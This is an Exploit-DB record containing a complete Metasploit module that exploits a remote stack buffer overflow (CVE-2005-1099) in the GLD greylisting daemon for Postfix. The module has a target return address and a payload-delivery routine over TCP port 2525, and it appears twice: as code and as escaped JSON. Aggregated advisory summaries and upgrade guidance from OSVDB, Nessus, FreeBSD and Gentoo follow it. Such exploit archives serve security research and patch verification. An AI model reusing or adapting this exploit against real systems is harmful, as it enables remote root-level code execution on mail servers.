ID EDB-ID:10023 Type exploitdb Reporter patrick Modified 2005-04-12T00:00:00
Description
Salim Gasmi GLD 1.0 - 1.4 Postfix Greylisting Buffer Overflow. CVE-2005-1099. Remote exploit for linux platform
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'GLD (Greylisting Daemon) Postfix Buffer Overflow',
'Description' => %q{
This module exploits a stack overflow in the Salim Gasmi
GLD <= 1.4 greylisting daemon for Postfix. By sending an
overly long string the stack can be overwritten.
},
'Version' => '$Revision$',
'Author' => [ 'patrick' ],
'Arch' => ARCH_X86,
'Platform' => 'linux',
'References' =>
[
[ 'CVE', '2005-1099' ],
[ 'OSVDB', '15492' ],
[ 'BID', '13129' ],
[ 'URL', 'http://www.milw0rm.com/exploits/934' ],
],
'Privileged' => true,
'License' => MSF_LICENSE,
'Payload' =>
{
'Space' => 1000,
'BadChars' => "\x00\x0a\x0d\x20=",
'StackAdjustment' => -3500,
},
'Targets' =>
[
[ 'RedHat Linux 7.0 (Guinness)', { 'Ret' => 0xbfffa5d8 } ],
],
'DefaultTarget' => 0
))
register_options(
[
Opt::RPORT(2525)
],
self.class
)
end
def exploit
connect
sploit = "sender="+ payload.encoded + "\r\n"
sploit << "client_address=" + [target['Ret']].pack('V') * 300 + "\r\n\r\n"
sock.put(sploit)
handler
disconnect
end
end
{"bulletinFamily": "exploit", "id": "EDB-ID:10023", "cvelist": ["CVE-2005-1099"], "modified": "2005-04-12T00:00:00", "lastseen": "2016-02-01T11:45:09", "edition": 1, "sourceData": "##\r\n# $Id$\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\n\r\nrequire 'msf/core'\r\n\r\n\r\n\tclass Metasploit3 < Msf::Exploit::Remote\r\n\r\n\tinclude Msf::Exploit::Remote::Tcp\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name'\t\t=> 'GLD (Greylisting Daemon) Postfix Buffer Overflow',\r\n\t\t\t'Description'\t=> %q{\r\n\t\t\t\tThis module exploits a stack overflow in the Salim Gasmi\r\n\t\t\t\tGLD <= 1.4 greylisting daemon for Postfix. By sending an\r\n\t\t\t\toverly long string the stack can be overwritten.\r\n\t\t\t},\r\n\t\t\t'Version'\t=> '$Revision$',\r\n\t\t\t'Author'\t=> [ 'patrick' ],\r\n\t\t\t'Arch'\t\t=> ARCH_X86,\r\n\t\t\t'Platform'\t=> 'linux',\r\n\t\t\t'References'\t=>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2005-1099' ],\r\n\t\t\t\t\t[ 'OSVDB', '15492' ],\r\n\t\t\t\t\t[ 'BID', '13129' ],\r\n\t\t\t\t\t[ 'URL', 'http://www.milw0rm.com/exploits/934' ],\r\n\t\t\t\t],\r\n\t\t\t'Privileged'\t=> true,\r\n\t\t\t'License'\t=> MSF_LICENSE,\r\n\t\t\t'Payload'\t=>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 1000,\r\n\t\t\t\t\t'BadChars' => \"\\x00\\x0a\\x0d\\x20=\",\r\n\t\t\t\t\t'StackAdjustment' => -3500,\r\n\t\t\t\t},\r\n\t\t\t'Targets'\t=>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'RedHat Linux 7.0 (Guinness)', { 'Ret' => 0xbfffa5d8 } ],\r\n\t\t\t\t],\r\n\t\t\t'DefaultTarget'\t=> 0\r\n\t\t))\r\n\r\n\t\tregister_options(\r\n\t\t\t[\r\n\t\t\t\tOpt::RPORT(2525)\r\n\t\t\t],\r\n\t\t\tself.class\r\n\t\t)\r\n\tend\r\n\t\r\n\tdef exploit\r\n\t\tconnect\r\n\r\n\t\tsploit = \"sender=\"+ payload.encoded + \"\\r\\n\"\r\n\t\tsploit << \"client_address=\" + [target['Ret']].pack('V') * 300 + \"\\r\\n\\r\\n\"\r\n\r\n\t\tsock.put(sploit)\r\n\t\thandler\r\n\t\tdisconnect\r\n\r\n\tend\r\n\r\nend\r\n", "published": "2005-04-12T00:00:00", "href": "https://www.exploit-db.com/exploits/10023/", "osvdbidlist": ["15492"], "reporter": "patrick", "hash": "322b28599e459563647661e601e352d98a5de6535f278731e6a3993273ff6194", "title": "Salim Gasmi GLD 1.0 - 1.4 - Postfix Greylisting Buffer Overflow", "history": [], "type": "exploitdb", "objectVersion": "1.0", "description": "Salim Gasmi GLD 1.0 - 1.4 Postfix Greylisting Buffer Overflow. CVE-2005-1099. Remote exploit for linux platform", "references": [], "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/10023/", "viewCount": 2, "enchantments": {"vulnersScore": 7.5}}
{"result": {"cve": [{"id": "CVE-2005-1099", "type": "cve", "title": "CVE-2005-1099", "description": "Multiple buffer overflows in the HandleChild function in server.c in Greylisting daemon (GLD) 1.3 and 1.4, when GLD is listening on a network interface, allow remote attackers to execute arbitrary code.", "published": "2005-04-12T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-1099", "cvelist": ["CVE-2005-1099"], "lastseen": "2017-07-11T11:14:51"}], "osvdb": [{"id": "OSVDB:15492", "type": "osvdb", "title": "GLD server.c Remote Overflow", "description": "## Vulnerability Description\nA remote overflow exists in GLD. GLD fails to properly check boundaries in server.c functions resulting in a buffer overflow. With a specially crafted request, an attacker can cause execute arbitrary code resulting in a loss of integrity.\n## Solution Description\nUpgrade to version 1.5 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## Short Description\nA remote overflow exists in GLD. GLD fails to properly check boundaries in server.c functions resulting in a buffer overflow. With a specially crafted request, an attacker can cause execute arbitrary code resulting in a loss of integrity.\n## References:\nVendor URL: http://www.gasmi.net/gld.html\nSecurity Tracker: 1013678\n[Secunia Advisory ID:14941](https://secuniaresearch.flexerasoftware.com/advisories/14941/)\n[Secunia Advisory ID:14951](https://secuniaresearch.flexerasoftware.com/advisories/14951/)\n[Related OSVDB ID: 15493](https://vulners.com/osvdb/OSVDB:15493)\nOther Advisory URL: http://security.gentoo.org/glsa/glsa-200504-10.xml\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2005-04/0174.html\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2005-04/0169.html\nKeyword: INetCop Security Advisory #2005-0x82-026\nKeyword: TCP port 2525\nKeyword: GreyList Daemon\n[CVE-2005-1099](https://vulners.com/cve/CVE-2005-1099)\n", "published": "2005-04-12T02:38:52", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://vulners.com/osvdb/OSVDB:15492", "cvelist": ["CVE-2005-1099"], "lastseen": "2017-04-28T13:20:11"}], "packetstorm": [{"id": "PACKETSTORM:82242", "type": "packetstorm", "title": "GLD (Greylisting Daemon) Postfix Buffer Overflow", "description": "", "published": "2009-10-27T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://packetstormsecurity.com/files/82242/GLD-Greylisting-Daemon-Postfix-Buffer-Overflow.html", "cvelist": ["CVE-2005-1099"], "lastseen": "2016-12-05T22:11:39"}], "exploitdb": [{"id": "EDB-ID:16841", "type": "exploitdb", "title": "GLD Greylisting Daemon Postfix Buffer Overflow", "description": "GLD (Greylisting Daemon) Postfix Buffer Overflow. CVE-2005-1099. Remote exploit for linux platform", "published": "2010-07-03T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.exploit-db.com/exploits/16841/", "cvelist": ["CVE-2005-1099"], "lastseen": "2016-02-02T06:38:24"}, {"id": "EDB-ID:25392", "type": "exploitdb", "title": "Salim Gasmi GLD 1.x Postfix Greylisting Daemon Buffer Overflow Vulnerability", "description": "Salim Gasmi GLD 1.x Postfix Greylisting Daemon Buffer Overflow Vulnerability. CVE-2005-1099. Remote exploit for linux platform", "published": "2005-04-12T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.exploit-db.com/exploits/25392/", "cvelist": ["CVE-2005-1099"], "lastseen": "2016-02-03T01:16:13"}], "metasploit": [{"id": "MSF:EXPLOIT/LINUX/MISC/GLD_POSTFIX", "type": "metasploit", "title": "GLD (Greylisting Daemon) Postfix Buffer Overflow", "description": "This module exploits a stack buffer overflow in the Salim Gasmi GLD <= 1.4 greylisting daemon for Postfix. By sending an overly long string the stack can be overwritten.", "published": "2008-06-07T02:16:34", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "", "cvelist": ["CVE-2005-1099"], "lastseen": "2018-02-28T11:02:48"}], "nessus": [{"id": "FREEBSD_PKG_6C2D4F29AF3E11D9837D000E0C2E438A.NASL", "type": "nessus", "title": "FreeBSD : gld -- format string and buffer overflow vulnerabilities (6c2d4f29-af3e-11d9-837d-000e0c2e438a)", "description": "Gld has been found vulnerable to multiple buffer overflows as well as multiple format string vulnerabilities.\n\nAn attacker could exploit this vulnerability to execute arbitrary code with the permissions of the user running Gld, the default user being root.\n\nThe FreeBSD port defaults to running gld as the root user. The risk of exploitation can be minimized by making gld listen on the loopback address only, or configure it to only accept connections from trusted smtp servers.", "published": "2005-07-13T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.tenable.com/plugins/index.php?view=single&id=18974", "cvelist": ["CVE-2005-1100", "CVE-2005-1099"], "lastseen": "2017-10-29T13:37:20"}, {"id": "GENTOO_GLSA-200504-10.NASL", "type": "nessus", "title": "GLSA-200504-10 : Gld: Remote execution of arbitrary code", "description": "The remote host is affected by the vulnerability described in GLSA-200504-10 (Gld: Remote execution of arbitrary code)\n\n dong-hun discovered several buffer overflows in server.c, as well as several format string vulnerabilities in cnf.c.\n Impact :\n\n An attacker could exploit this vulnerability to execute arbitrary code with the permissions of the user running Gld, the default user being root.\n Workaround :\n\n There is no known workaround at this time.", "published": "2005-04-14T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.tenable.com/plugins/index.php?view=single&id=18043", "cvelist": ["CVE-2005-1100", "CVE-2005-1099"], "lastseen": "2017-10-29T13:33:31"}], "freebsd": [{"id": "6C2D4F29-AF3E-11D9-837D-000E0C2E438A", "type": "freebsd", "title": "gld -- format string and buffer overflow vulnerabilities", "description": "\nGld has been found vulnerable to multiple buffer overflows as\n\t well as multiple format string vulnerabilities.\n\nAn attacker could exploit this vulnerability to execute\n\t arbitrary code with the permissions of the user running Gld,\n\t the default user being root.\n\nThe FreeBSD port defaults to running gld as the root user.\n\t The risk of exploitation can be minimized by making gld\n\t listen on the loopback address only, or configure it to only\n\t accept connections from trusted smtp servers.\n", "published": "2005-04-12T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://vuxml.freebsd.org/freebsd/6c2d4f29-af3e-11d9-837d-000e0c2e438a.html", "cvelist": ["CVE-2005-1100", "CVE-2005-1099"], "lastseen": "2016-09-26T17:25:15"}], "openvas": [{"id": "OPENVAS:54912", "type": "openvas", "title": "Gentoo Security Advisory GLSA 200504-10 (Gld)", "description": "The remote host is missing updates announced in\nadvisory GLSA 200504-10.", "published": "2008-09-24T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://plugins.openvas.org/nasl.php?oid=54912", "cvelist": ["CVE-2005-1100", "CVE-2005-1099"], "lastseen": "2017-07-24T12:49:44"}, {"id": "OPENVAS:52130", "type": "openvas", "title": "FreeBSD Ports: gld", "description": "The remote host is missing an update to the system\nas announced in the referenced advisory.", "published": "2008-09-04T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://plugins.openvas.org/nasl.php?oid=52130", "cvelist": ["CVE-2005-1100", "CVE-2005-1099"], "lastseen": "2017-07-02T21:10:14"}], "gentoo": [{"id": "GLSA-200504-10", "type": "gentoo", "title": "Gld: Remote execution of arbitrary code", "description": "### Background\n\nGld is a standalone greylisting server for Postfix. \n\n### Description\n\ndong-hun discovered several buffer overflows in server.c, as well as several format string vulnerabilities in cnf.c. \n\n### Impact\n\nAn attacker could exploit this vulnerability to execute arbitrary code with the permissions of the user running Gld, the default user being root. \n\n### Workaround\n\nThere is no known workaround at this time. \n\n### Resolution\n\nAll Gld users should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=mail-filter/gld-1.5\"", "published": "2005-04-13T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://security.gentoo.org/glsa/200504-10", "cvelist": ["CVE-2005-1100", "CVE-2005-1099"], "lastseen": "2016-09-06T19:46:59"}]}}
